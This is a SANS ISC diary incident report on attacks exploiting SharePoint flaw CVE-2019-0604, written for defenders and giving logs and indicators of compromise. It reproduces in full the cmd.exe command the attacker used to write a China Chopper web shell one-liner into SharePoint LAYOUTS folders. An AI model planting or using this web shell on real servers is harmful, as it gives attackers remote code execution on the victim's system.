ISC Stormcast For Tuesday, May 21st 2019 https://isc.sans.edu/podcastdetail.html?id=6506

CVE-2019-0604 Attack

Published: 2019-05-20
Last Updated: 2019-05-20 11:18:21 UTC
by Tom Webb (Version: 1)
2 comment(s)

Over the past week, I started seeing attacks on Sharepoint servers using vulnerability CVE-2019-0604.  The Zero Day Initiative has a great write up(1) on the exploit of the vulnerability. 

Initial detection of the exploit came from endpoint exploit detection. When reviewing the IIS logs, we saw a post to the Picker.aspx. This appears to be the most common entry point for this attack exploiting CVE-2019-0604. 

Initial Log 
        2019-05-02 07:04:13 192.168.1.1 POST /_layouts/15/Picker.aspx - 443 - 121.147.96.8 python-requests/2.18.4 200 0 0 670

In the case of this attacker, they dropper a China Chopper payload on the server. China Chopper has been around for a long time. Crowdstrike did a great writeup(2) in 2015.  The payload for this is just a one-liner that was echoed into the files via command line. 

The anomaly that endpoint detected was a cmd shell spawning by w3wp.exe process. 

      Parent Process: w3wp.exe
      Process Name: cmd.exe

        "C:\Windows\System32\cmd.exe" /c echo ^<%@ Page Language="Jscript"%^>^<%eval(Request.Item["t"],"unsafe");%^> > "%CommonProgramFiles%\Microsoft Shared\Web Server             Extensions\14\TEMPLATE\LAYOUTS\t.aspx" & echo ^<%@ Page Language="Jscript"%^>^<%eval(Request.Item["t"],"unsafe");%^> > 
       "%CommonProgramFiles%\Microsoft Shared\Web Server Extensions\15\TEMPLATE\LAYOUTS\t.aspx" & echo ^<%@ Page Language="Jscript"%^>^<%eval(Request.Item["t"],"unsafe");%^> > 
        "%CommonProgramFiles%\Microsoft Shared\Web Server Extensions\16\TEMPLATE\LAYOUTS\t.aspx"

While the attack appears to be an automated drive-by, the attackers did not come back and do any additional modifications to the server.


IOC's 

Attackers IPS:
121[.]147[.]96[.]8    
211[.]222[.]223[.]14 
119[.]65[.]36[.]2 

User agent string:python-requests/2.18.4

Chopper Files created:
"%CommonProgramFiles%\Microsoft Shared\Web Server Extensions\16\TEMPLATE\LAYOUTS\t.aspx"
"%CommonProgramFiles%\Microsoft Shared\Web Server Extensions\15\TEMPLATE\LAYOUTS\t.aspx”
"%CommonProgramFiles%\Microsoft Shared\Web Server Extensions\14\TEMPLATE\LAYOUTS\t.aspx”


(1)https://www.thezdi.com/blog/2019/3/13/cve-2019-0604-details-of-a-microsoft-sharepoint-rce-vulnerability
(2)https://www.crowdstrike.com/blog/chopping-packets-decoding-china-chopper-web-shell-traffic-over-ssl/

Thanks to my team for the analysis.

--

Tom Webb

@twsecblog

Keywords: sharepoint
2 comment(s)

Comments

Login here to join the discussion.


Diary Archives